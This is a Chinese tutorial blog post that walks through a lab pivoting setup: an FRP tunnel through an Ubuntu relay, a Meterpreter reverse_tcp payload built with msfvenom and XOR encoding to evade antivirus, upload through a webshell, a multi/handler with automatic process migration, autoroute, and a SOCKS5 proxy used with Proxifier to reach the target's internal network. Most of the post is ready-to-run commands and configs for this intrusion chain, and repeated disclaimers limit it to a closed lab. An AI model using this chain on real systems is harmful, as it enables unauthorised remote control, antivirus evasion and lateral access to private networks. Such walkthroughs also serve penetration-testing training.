内网穿透第一期：FRP+MSF+Proxifier本地靶场环境搭建

！！！免责声明！！！

在法律允许的最大范围内，文档作者及关联方对未经授权操作，范围外操作，不可抵抗力不承担任何民事、行政或刑事责任！！！不得进行任何的非法渗透攻击，请遵守法律法规！！！

本文仅用于网络安全合法技术学习，所有操作均在本人物理机+本地虚拟机组成的封闭靶场环境中完成，全程无外网访问、无攻击行为，严禁将本文内容用于任何违反国家法律法规、侵犯他人权益的行为，违者后果自负。

平台审核严格，有些术语做了处理，望谅解

一、环境说明

• Ubuntu服务器（frps服务端）

• Kali攻击机（frpc客户端+MSF）：IP  192.168.58.128

• Win7靶机（木马+IIS网站）：内网IP  10.10.10.10 ，IIS网站端口  1212

• Win11攻击机（Proxifier）：通过代理访问Win7内网

1.使用frp服务呢，就是因为攻击机和目标靶机不在同一个网段，不能相互访问，或者靶机有公网IP，kali没有，此时可以利用一个有公网IP的Ubuntu服务器作为跳板去访问靶机的内网

2.当然执行这所有操作之前呢要拿到对方的webshell

3.内网穿透链路流程：

flowchart TD subgraph 目标靶机 A[Win7 主机<br/>IIS 网站<br/>IP: 10.10.10.10:1212] end subgraph 转发中继层 B[Ubuntu 服务器<br/>frps 服务端<br/>端口: 8888<br/>TCP 隧道转发] end subgraph 攻击控制端 C[Kali Linux<br/>frpc 客户端 + MSF 监听器<br/>端口: 5566<br/>组件: Meterpreter 会话<br/>autoroute 路由 + S5转发 端口：1080] end subgraph 本地终端 D[Win11 物理机<br/>Proxifier S5 <br/>浏览器访问目标站点] end %% 链路连接与标注（完全沿用你要的流量走向） A -- 反向木马连接 --> B B -- 建立 frp TCP 隧道 --> C C -- 代理转发 --> D D -- 代理流量访问 --> A %% 样式美化（适配flowchart TD，无语法冲突） linkStyle 0 stroke:#ff6b6b,stroke-width:2px linkStyle 1 stroke:#4ecdc4,stroke-width:2px linkStyle 2 stroke:#45b7d1,stroke-width:2px linkStyle 3 stroke:#feca57,stroke-width:2px classDef target fill:#ffebee,stroke:#c62828,stroke-width:2px classDef relay fill:#e8f5e9,stroke:#2e7d32,stroke-width:2px classDef attacker fill:#fff3e0,stroke:#ef6c00,stroke-width:2px classDef local fill:#f3e5f5,stroke:#8e24aa,stroke-width:2px class A target class B relay class C attacker class D local

二、frp 服务端（Ubuntu）配置

1. 配置文件frps.toml

[common]
# frp服务端监听端口，必须在防火墙放行
bind_port = 7000

# 下面的可以自行添加：
# 自定义强鉴权token，防止未授权接入
token = MySecureFrpToken@2025
# 开启TCP复用，提升转发稳定性
tcp_mux = true
# 心跳超时时间，避免断连
heartbeat_timeout = 30
# 允许客户端绑定任意端口（按需开启）
allow_ports = 1-65535

2. 防火墙放行端口（Ubuntu）

# 开的要放行端口,我的没开
sudo ufw allow 7000/tcp
sudo ufw allow 8888/tcp  # 木马转发端口
sudo ufw reload

3. 启动命令

# 赋予执行权限
chmod +x frps
# 运行服务
./frps -c frps.toml

# 可选
# 后台运行，关闭终端不中断
nohup ./frps -c frps.toml > frps.log 2>&1 &
# 查看运行状态
ps aux | grep frps

三、frp 客户端（Kali）配置

1. 配置文件frpc.toml

[common]
# Ubuntu服务器IP
server_addr = xxx.xxx.xxx.xxx 
# 服务端bind_port
server_port = 7000
# 和服务端完全一致的token(可选)
token = MySecureFrpToken@2025
# 开启TCP复用(可选)
tcp_mux = true
# 心跳间隔(可选)
heartbeat_interval = 10

# MSF木马转发隧道（核心）
[msf-tcp]
type = tcp
# 监听所有网卡，允许外部连接
local_ip = 0.0.0.0
# Kali本地MSF监听器端口
local_port = 5566
# Ubuntu服务器开放的外网端口
remote_port = 8888
# 保留真实源IP，解决MSF会话校验问题(可选)
stream_echo = true

2. 启动命令

# 赋予执行权限
chmod +x frpc
# 运行客户端
./frpc -c frpc.toml
# 后台运行(可选)
nohup ./frpc -c frpc.toml > frpc.log 2>&1 &
# 查看运行状态(可选)
ps aux | grep frpc

四、MSF木马生成 + 监听器 + 代理配置（Kali）

1. 生成Win7 64位木马

• 这里我用的是Metasploit Pro 5.0.0的WebGUI界面生成的

• 也可以用以下命令生成

msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=xxx.xxx.xxx.xxx \  # 必须填Ubuntu服务器IP
LPORT=8888 \             # 必须填Ubuntu服务器8888端口
-e x64/xor_dynamic -i 5 \  # 基础免杀编码
-f exe -o payload.exe      # 整个语句是一行的！

2.用蚁剑上传到目标机执行

3.MSF监听器配置（稳定后台运行）

msfpro    #没有pro版的可以用msfconsole启动
use exploit/multi/handler
# 严格匹配木马payload架构
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# 监听所有网卡，允许frp转发流量
set LHOST 0.0.0.0
# 和frpc local_port一致
set LPORT 5566
# 会话断开不退出监听器（可选）
set ExitOnSession false
# 上线自动迁移进程，防止会话断（可选）
set AutoRunScript post/windows/manage/migrate
# 后台运行
run -j

4. 内网路由 + S5配置（Kali 执行）

# 连接会话后，放在后台
background
# 1. 查看上线会话，确认session号（这里是session 3，按需修改）
sessions

# 2. 给Win7内网网段添加autoroute路由
use post/multi/manage/autoroute
set session 3
set subnet 10.10.10.0
set netmask 255.255.255.0
run

# 3. 启动S5
use auxiliary/server/s***s_p**xy
set version 5
set srvhost 0.0.0.0
set srvport 1080
# 后台运行，不占用终端
run -j

# 4. 验证路由（可选）
route print  # 确认10.10.10.0/24走session 3
jobs  # 确认job正常运行（可选）

五、Win7 IIS 网站启动（Win7 执行）

• IIS默认自启动，有时会挂，启动W3SVC服务即可

# cmd 执行
net start http
net start was
net start w3svc

• 这里只做演习，网站简陋

六、Proxifier完整配置（Win11）

1. 流量转发服务器配置

• 打开 Proxifier → Profile → proxyServer → Add

| 配置项  | 填写内容                    |
| ---- | -------------------------    |
| 协议   | S**S V 5            |
| 地址   | 192.168.58.128(Kali 的 IP) |
| 端口   | 1080                       |
| 认证   | 无                         |

2. 代理规则配置

• 把规则置顶，确保优先生效

3. 验证代理连通性

• 点击check，有绿色条表示通过了

七、访问Win7内网

• 通过后，Win11流量自动走 Kali，用本地浏览器直接访问http://10.10.10.10:1212即可

• 可以看到成功访问了，Win7内网 10.10.10.10 被打穿了！

• 后面呢，可以做收集系统信息，权限提升，账号密码枚举，权限维持，这些后面会陆续出文章讲解

• 以上所有操作都在靶机进行，请勿用于任何非法用途！

！！！免责声明！！！

在法律允许的最大范围内，文档作者及关联方对未经授权操作，范围外操作，不可抵抗力不承担任何民事、行政或刑事责任！！！不得进行任何的非法渗透攻击，请遵守法律法规！！！

！！！免责声明！！！

在法律允许的最大范围内，文档作者及关联方对未经授权操作，范围外操作，不可抵抗力不承担任何民事、行政或刑事责任！！！不得进行任何的非法渗透攻击，请遵守法律法规！！！

！！！免责声明！！！

在法律允许的最大范围内，文档作者及关联方对未经授权操作，范围外操作，不可抵抗力不承担任何民事、行政或刑事责任！！！不得进行任何的非法渗透攻击，请遵守法律法规！！！